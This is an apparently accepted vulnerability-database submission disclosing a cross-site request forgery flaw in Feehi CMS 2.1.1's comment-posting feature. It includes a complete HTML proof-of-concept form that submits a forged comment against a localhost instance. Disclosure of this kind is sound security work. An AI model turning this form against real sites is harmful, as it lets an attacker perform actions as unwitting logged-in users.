| Title | Feehi Cms 2.1.1 Csrf Vulnerability Exploit |
|---|
| Description | # Google Dork: [not applicable]
# Date: 14082022
# Exploit Author: haruntamokur
# Vendor Homepage: https://feehi.com/
# Software Link: https://github.com/liufee/cms
# Version: 2.1.1 (REQUIRED)
# Tested on: Windows 10
# CVE : [not applicable]
When you log in application with user and password, you reach “Post my comment” tab. The function has Csrf exploit. If you write exploit code like following, you can exploit this vulnerability.
URL: http://localhost:8080/index.php?r=article%2Fview&id=22#comment-7
Exploit Code
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:8080/index.php?r=article%2Fcomment" method="POST">
<input type="hidden" name="_csrf" value="5EgNi95Un03ZlbGkl3dj2u_lxkDWSlBLz0h4q__4to-rMUHNl2bxCJ2h4calBlacv7_2NqAdJBmpDxKYmsmCuA==" />
<input type="hidden" name="Comment[aid]" value="22" />
<input type="hidden" name="Comment[content]" value="CSRFTest" />
<input type="hidden" name="comment_post_ID" value="114" />
<input type="hidden" name="Comment[reply_to]" value="0" />
<input type="hidden" name="akismet_comment_nonce" value="32920dc775" />
<input type="hidden" name="ak_js" value="101" />
<input type="hidden" name="comment_mail_notify" value="comment_mail_notify" />
<input type="hidden" name="Comment[nickname]" value="harun" />
<input type="hidden" name="Comment[email]" value="" />
<input type="hidden" name="Comment[website_url]" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
|
|---|
| User | harun.tamokur (UID 35839) |
|---|
| Submission | 11/15/2022 11:45 (4 years ago) |
|---|
| Moderation | 11/16/2022 08:53 (21 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 213788 [FeehiCMS Post My Comment Tab cross-site request forgery] |
|---|
| Points | 17 |
|---|